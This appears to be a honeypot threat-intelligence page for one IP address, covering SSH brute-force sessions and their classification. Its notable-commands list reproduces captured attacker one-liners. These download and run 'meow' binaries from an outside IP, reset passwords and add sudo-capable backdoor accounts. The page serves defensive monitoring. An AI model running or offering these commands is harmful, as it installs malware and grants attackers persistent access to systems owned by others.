← Back to feed

35.236.253.234

Threat Confidence
58%
Location
🇺🇸 US / Washington
ASN
AS396982 · Google LLC
Cloud Provider
Total Events
218
Above average by volume
Agent Count
1
First / Last Seen
2026-05-31 14:10 — 2026-05-31 14:15
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Execution
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Blocklist.de
Reported 2026-05-31 16:02
blocklist_de:reported
Session Forensics
scanner ×5 malware_dropper ×1 interactive_operator ×3 opportunistic_bruter ×5
Sessions
14 (9 with login)
Avg Depth Score
0.5
Commands Executed
110
Files Downloaded
1
Notable Commands
  • echo 'oracle' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):oracle > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):oracle > /tmp/mew)
  • whoami
  • cd /tmp
  • ulimit -n 1020000
  • rm -rf meow*
  • wget http://34.11.136.102/meow
  • curl -O http://34.11.136.102/meow
  • chmod 777 meow
  • ./meow
  • echo 'server' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew)
  • echo 'test' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):test > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):test > /tmp/mew)
  • echo 'test123' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):test123 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):test123 > /tmp/mew)
Fingerprints
SSH-2.0-Go
Evidence Timeline
Scanner cd7fabb03cff newark_01 · 2026-05-31 14:10
15%
Loading events...
Scanner a223698a5ea4 newark_01 · 2026-05-31 14:10
15%
Loading events...
Interactive Operator 22a5d29087d2 newark_01 · 2026-05-31 14:10
28 1 90%
Loading events...
Interactive Operator d8451fa7fd3d newark_01 · 2026-05-31 14:10
28 1 90%
Loading events...
Interactive Operator b8e20e0e44ae newark_01 · 2026-05-31 14:10
28 1 90%
Loading events...
Malware Dropper dfe6f751866a newark_01 · 2026-05-31 14:10
26 1 1 100%
Loading events...
Opportunistic Bruter c84db8d94c00 newark_01 · 2026-05-31 14:10
1 50%
Loading events...
Opportunistic Bruter d500aa448c4b newark_01 · 2026-05-31 14:10
1 50%
Loading events...
Opportunistic Bruter 0b595f2a2ec2 newark_01 · 2026-05-31 14:10
1 50%
Loading events...
Opportunistic Bruter 42213c64f166 newark_01 · 2026-05-31 14:10
1 50%
Loading events...
Opportunistic Bruter 6a813af87f5f newark_01 · 2026-05-31 14:10
1 50%
Loading events...
Scanner c3629e632673 newark_01 · 2026-05-31 14:10
15%
Loading events...
Scanner 0b671b748e6f newark_01 · 2026-05-31 14:10
15%
Loading events...
Scanner a858644cf3a9 newark_01 · 2026-05-31 14:10
15%
Loading events...